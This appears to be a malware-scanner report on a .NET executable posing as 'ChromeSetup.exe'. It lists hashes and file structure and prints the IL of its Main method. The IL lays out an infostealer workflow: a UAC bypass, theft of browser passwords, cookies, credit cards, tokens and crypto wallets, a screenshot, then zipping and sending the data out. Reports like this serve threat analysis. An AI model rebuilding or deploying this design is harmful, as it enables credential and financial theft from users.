Suspicious
Suspect

802aa7a4a57b22e797ebeb2b3b638527

PE Executable | MD5: 802aa7a4a57b22e797ebeb2b3b638527 | Size: 2.61 MB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very low

Hash
MD5: 802aa7a4a57b22e797ebeb2b3b638527
Sha1: 6179f1929d3b2cdeb9d453ef1ec5ce3c88521923
Sha256: 038da7941cb395df589983f3b09346694fe2a3a9e458a295ebfd5bd7c9fdb434
Sha384: b766225bf0cb6d7fab8f99f0787c75d75e38148218089c246240135c717c6ec73a70a5b55771395cd96a3d7707c348d8
Sha512: abf6d2065acf94e8e917e427838466613ab130c90a8334b8177be69d91c28705e1f46e66f017f275430dd8c1e573893017cd4eee08061f535ea6f46393472da1
SSDeep: 49152:j7L+2upjBVhbAbXMtQl/wLz8r5S5l7KdVSZ4eY83TAcmi:/L+2upjBVGVl/lQrCSZ4183Dmi
TLSH: CAC5238537FC4909F6BF9B702CB6662486BDB8A35E25DB5E05C4309C1930BE5AD60F23

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
  Structure
    DosHeader
    PE Header
    Optional Header (x86)
    Section Headers
      .text
      .rsrc
      .reloc
  Resources
    RT_VERSION
      ID:0001
        ID:0
    RT_MANIFEST
      ID:0001
        ID:0
  .Net Resources
    costura.bouncycastle.cryptography.dll.compressed
      [Authenticode]_31a7df4f.p7b
      Structure
        DosHeader
        PE Header
        Optional Header (x86)
        Section Headers
          .text
          .rsrc
          .reloc
      Resources
        RT_VERSION
          ID:0001
            ID:0
    costura.costura.dll.compressed
      Structure
        DosHeader
        PE Header
        Optional Header (x86)
        Section Headers
          .text
          .rsrc
          .reloc
      Resources
        RT_VERSION
          ID:0001
            ID:0
    costura.costura.pdb.compressed
    costura.metadata
Information
Info: PE Detect: PeReader OK (file layout)
Info: PDB Path: C:\Users\Administrator\AppData\Local\Temp\2\StubTemplate_3853\obj\Release\ChromeSetup.pdb
Module Name: ChromeSetup.exe
Full Name: ChromeSetup.exe
EntryPoint: System.Void chrome_v20_decryption_CSharp.Program::Main(System.String[])
Scope Name: ChromeSetup.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: ChromeSetup
Assembly Version: 131.0.6778.140
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: .NETFramework,Version=v4.8
Total Strings: 1127
Main Method: System.Void chrome_v20_decryption_CSharp.Program::Main(System.String[])
Main IL Instruction Count: 440

Main IL

call System.Int32 chrome_v20_decryption_CSharp.Program::CheckSeenBefore() stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_seenBeforeCount call System.Boolean chrome_v20_decryption_CSharp.Program::FreeConsole() pop <null> leave.s IL_0015: nop pop <null> leave.s IL_0015: nop nop <null> ldc.i4 4032 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) leave.s IL_0025: nop pop <null> leave.s IL_0025: nop nop <null> call System.Boolean chrome_v20_decryption_CSharp.Program::IsLicenseValid() brtrue.s IL_0032: leave.s IL_003A leave IL_044C: ret leave.s IL_003A: nop pop <null> leave IL_044C: ret nop <null> call System.Void chrome_v20_decryption_CSharp.Program::SendPhoneHome() leave.s IL_0045: ldc.i4.0 pop <null> leave.s IL_0045: ldc.i4.0 ldc.i4.0 <null> stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> ldc.i4.0 <null> stloc.3 <null> ldc.i4.0 <null> stloc.s V_4 ldarg.0 <null> ldlen <null> brtrue.s IL_0064: ldc.i4.0 ldc.i4.1 <null> stloc.0 <null> ldc.i4.1 <null> stloc.1 <null> ldc.i4.1 <null> stloc.2 <null> ldc.i4.1 <null> stloc.3 <null> ldc.i4.1 <null> stloc.s V_4 br IL_01FA: ldloc.0 ldc.i4.0 <null> stloc.s V_11 br IL_01F0: ldloc.s V_11 ldarg.0 <null> ldloc.s V_11 ldelem.ref <null> callvirt System.String System.String::ToLower() stloc.s V_12 ldloc.s V_12 brfalse IL_01EA: ldloc.s V_11 ldloc.s V_12 call System.Int32 System.String::get_Length() stloc.s V_13 ldloc.s V_13 ldc.i4.2 <null> beq.s IL_00B7: ldloc.s V_12 ldloc.s V_13 ldc.i4.3 <null> beq IL_01B7: ldloc.s V_12 ldloc.s V_13 ldc.i4.s 9 sub <null> switch dnlib.DotNet.Emit.Instruction[] br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldc.i4.1 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 100 bgt.un.s IL_00DB: ldloc.s V_14 ldloc.s V_14 ldc.i4.s 99 beq.s IL_013E: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 100 beq IL_0167: ldloc.s V_12 br IL_01EA: ldloc.s V_11 ldloc.s V_14 ldc.i4.s 104 beq.s IL_0154: ldloc.s 
V_12 ldloc.s V_14 ldc.i4.s 112 beq.s IL_0128: ldloc.s V_12 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldc.i4.2 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 100 beq IL_0187: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 112 beq.s IL_0177: ldloc.s V_12 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldc.i4.2 <null> call System.Char System.String::get_Chars(System.Int32) stloc.s V_14 ldloc.s V_14 ldc.i4.s 99 beq.s IL_0197: ldloc.s V_12 ldloc.s V_14 ldc.i4.s 104 beq IL_01A7: ldloc.s V_12 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr -p call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_01D7: ldc.i4.1 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr -c call System.Boolean System.String::op_Equality(System.String,System.String) brtrue IL_01DB: ldc.i4.1 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr -h call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01DF: ldc.i4.1 br IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr -d call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01E3: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr --passwords call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01D7: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr --downloads call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01E3: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr --cookies call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01DB: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr --history call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01DF: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr -cc call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_01E7: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldloc.s V_12 ldstr --creditcards call System.Boolean 
System.String::op_Equality(System.String,System.String) brtrue.s IL_01E7: ldc.i4.1 br.s IL_01EA: ldloc.s V_11 ldc.i4.1 <null> stloc.0 <null> br.s IL_01EA: ldloc.s V_11 ldc.i4.1 <null> stloc.1 <null> br.s IL_01EA: ldloc.s V_11 ldc.i4.1 <null> stloc.2 <null> br.s IL_01EA: ldloc.s V_11 ldc.i4.1 <null> stloc.3 <null> br.s IL_01EA: ldloc.s V_11 ldc.i4.1 <null> stloc.s V_4 ldloc.s V_11 ldc.i4.1 <null> add <null> stloc.s V_11 ldloc.s V_11 ldarg.0 <null> ldlen <null> conv.i4 <null> blt IL_006C: ldarg.0 ldloc.0 <null> ldloc.1 <null> or <null> ldloc.s V_4 or <null> brfalse.s IL_021C: newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() call System.Boolean chrome_v20_decryption_CSharp.Program::IsAdmin() brtrue.s IL_021C: newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() call System.Boolean chrome_v20_decryption_CSharp.Program/UACBypass::BypassUAC() brfalse.s IL_0215: ldc.i4.0 leave IL_044C: ret ldc.i4.0 <null> stloc.0 <null> ldc.i4.0 <null> stloc.1 <null> ldc.i4.0 <null> stloc.s V_4 newobj System.Void chrome_v20_decryption_CSharp.Chromium::.ctor() stloc.s V_5 ldnull <null> stloc.s V_6 ldnull <null> stloc.s V_7 ldnull <null> stloc.s V_8 ldnull <null> stloc.s V_9 ldnull <null> stloc.s V_10 ldloc.0 <null> brfalse.s IL_023E: leave.s IL_0243 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Login>> chrome_v20_decryption_CSharp.Chromium::GetLoginDataByBrowser() stloc.s V_6 leave.s IL_0243: nop pop <null> leave.s IL_0243: nop nop <null> ldloc.1 <null> brfalse.s IL_0250: leave.s IL_0255 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Cookie>> chrome_v20_decryption_CSharp.Chromium::GetCookiesByBrowser() stloc.s V_7 leave.s IL_0255: nop pop <null> leave.s IL_0255: nop nop <null> ldloc.2 <null> brfalse.s IL_0262: leave.s IL_0267 ldloc.s V_5 callvirt 
System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/WebHistory>> chrome_v20_decryption_CSharp.Chromium::GetWebHistoryByBrowser() stloc.s V_8 leave.s IL_0267: nop pop <null> leave.s IL_0267: nop nop <null> ldloc.3 <null> brfalse.s IL_0274: leave.s IL_0279 ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Download>> chrome_v20_decryption_CSharp.Chromium::GetDownloadsByBrowser() stloc.s V_9 leave.s IL_0279: nop pop <null> leave.s IL_0279: nop nop <null> ldloc.s V_4 brfalse.s IL_0287: leave.s IL_028C ldloc.s V_5 callvirt System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/CreditCard>> chrome_v20_decryption_CSharp.Chromium::GetCreditCardsByBrowser() stloc.s V_10 leave.s IL_028C: nop pop <null> leave.s IL_028C: nop nop <null> ldloc.0 <null> brfalse.s IL_0297: leave.s IL_029C ldloc.s V_6 call System.Void chrome_v20_decryption_CSharp.Program::WriteLogins(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Login>>) leave.s IL_029C: nop pop <null> leave.s IL_029C: nop nop <null> ldloc.1 <null> brfalse.s IL_02A7: leave.s IL_02AC ldloc.s V_7 call System.Void chrome_v20_decryption_CSharp.Program::WriteCookies(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Cookie>>) leave.s IL_02AC: nop pop <null> leave.s IL_02AC: nop nop <null> ldloc.2 <null> brfalse.s IL_02B7: leave.s IL_02BC ldloc.s V_8 call System.Void chrome_v20_decryption_CSharp.Program::WriteHistory(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/WebHistory>>) leave.s IL_02BC: nop pop <null> leave.s IL_02BC: nop nop <null> ldloc.3 <null> brfalse.s 
IL_02C7: leave.s IL_02CC ldloc.s V_9 call System.Void chrome_v20_decryption_CSharp.Program::WriteDownloads(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/Download>>) leave.s IL_02CC: nop pop <null> leave.s IL_02CC: nop nop <null> ldloc.s V_4 brfalse.s IL_02D8: leave.s IL_02DD ldloc.s V_10 call System.Void chrome_v20_decryption_CSharp.Program::WriteCreditCards(System.Collections.Generic.Dictionary`2<System.String,System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Chromium/CreditCard>>) leave.s IL_02DD: nop pop <null> leave.s IL_02DD: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::GatherSystemInfo() leave.s IL_02E8: nop pop <null> leave.s IL_02E8: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ExtractTokens() leave.s IL_02F3: nop pop <null> leave.s IL_02F3: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ExtractPasswordManagers() leave.s IL_02FE: nop pop <null> leave.s IL_02FE: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::ScanFileSystem() leave.s IL_0309: nop pop <null> leave.s IL_0309: nop nop <null> call System.Void chrome_v20_decryption_CSharp.Program::CaptureScreenshot() leave.s IL_0314: nop pop <null> leave.s IL_0314: nop nop <null> call System.Void chrome_v20_decryption_CSharp.CryptoWallets::GrabCryptoWallets() call System.String chrome_v20_decryption_CSharp.Program::GetWalletsDirectory() stloc.s V_15 ldloc.s V_15 call System.Boolean System.IO.Directory::Exists(System.String) brfalse.s IL_0340: leave.s IL_0345 ldloc.s V_15 ldstr * ldc.i4.1 <null> call System.String[] System.IO.Directory::GetFiles(System.String,System.String,System.IO.SearchOption) ldlen <null> brfalse.s IL_0340: leave.s IL_0345 ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasWallets leave.s IL_0345: nop pop <null> leave.s IL_0345: nop nop <null> call 
System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxLogin> chrome_v20_decryption_CSharp.Firefox::GetLogins() callvirt System.Int32 System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxLogin>::get_Count() stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ble.s IL_036A: call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie> chrome_v20_decryption_CSharp.Firefox::GetCookies() ldsfld System.Int32 chrome_v20_decryption_CSharp.Program::_passwordCount ldloc.s V_16 add <null> stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_passwordCount ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasFirefox call System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie> chrome_v20_decryption_CSharp.Firefox::GetCookies() callvirt System.Int32 System.Collections.Generic.List`1<chrome_v20_decryption_CSharp.Firefox/FirefoxCookie>::get_Count() stloc.s V_17 ldloc.s V_17 ldc.i4.0 <null> ble.s IL_038E: call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() ldsfld System.Int32 chrome_v20_decryption_CSharp.Program::_cookieCount ldloc.s V_17 add <null> stsfld System.Int32 chrome_v20_decryption_CSharp.Program::_cookieCount ldc.i4.1 <null> stsfld System.Boolean chrome_v20_decryption_CSharp.Program::_hasFirefox call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() call System.Void chrome_v20_decryption_CSharp.Firefox::WriteFirefoxData(System.String) call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() call System.Void chrome_v20_decryption_CSharp.Firefox::CopyFirefoxProfiles(System.String) leave.s IL_03A7: nop pop <null> leave.s IL_03A7: nop nop <null> call System.String chrome_v20_decryption_CSharp.Program::GetOutputDirectory() stloc.s V_18 ldloc.s V_18 call System.Boolean System.IO.Directory::Exists(System.String) brfalse.s IL_0417: leave.s IL_0421 ldc.i4 500 call System.Void 
System.Threading.Thread::Sleep(System.Int32) ldloc.s V_18 call System.String chrome_v20_decryption_CSharp.Program::ZipFolder(System.String) stloc.s V_19 ldloc.s V_19 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0409: nop ldloc.s V_19 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0409: nop ldloc.s V_19 newobj System.Void System.IO.FileInfo::.ctor(System.String) ldc.i4 50331648 conv.i8 <null> stloc.s V_20 callvirt System.Int64 System.IO.FileInfo::get_Length() ldloc.s V_20 pop <null> pop <null> ldloc.s V_19 call System.Void chrome_v20_decryption_CSharp.Program::SendData(System.String) nop <null> ldloc.s V_19 call System.Void System.IO.File::Delete(System.String) leave.s IL_0409: nop pop <null> leave.s IL_0409: nop nop <null> ldloc.s V_18 ldc.i4.1 <null> call System.Void System.IO.Directory::Delete(System.String,System.Boolean) leave.s IL_0417: leave.s IL_0421 pop <null> leave.s IL_0417: leave.s IL_0421 leave.s IL_0421: nop callvirt System.Exception System.Exception::get_InnerException() pop <null> leave.s IL_0421: nop nop <null> ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) leave.s IL_0431: leave.s IL_044C pop <null> leave.s IL_0431: leave.s IL_044C leave.s IL_044C: ret pop <null> leave.s IL_044C: ret nop <null> call System.Void System.GC::Collect() call System.Void System.GC::WaitForPendingFinalizers() call System.Void System.GC::Collect() leave.s IL_044B: endfinally pop <null> leave.s IL_044B: endfinally endfinally <null> ret <null>

Characteristics
No malware configuration was found at this point.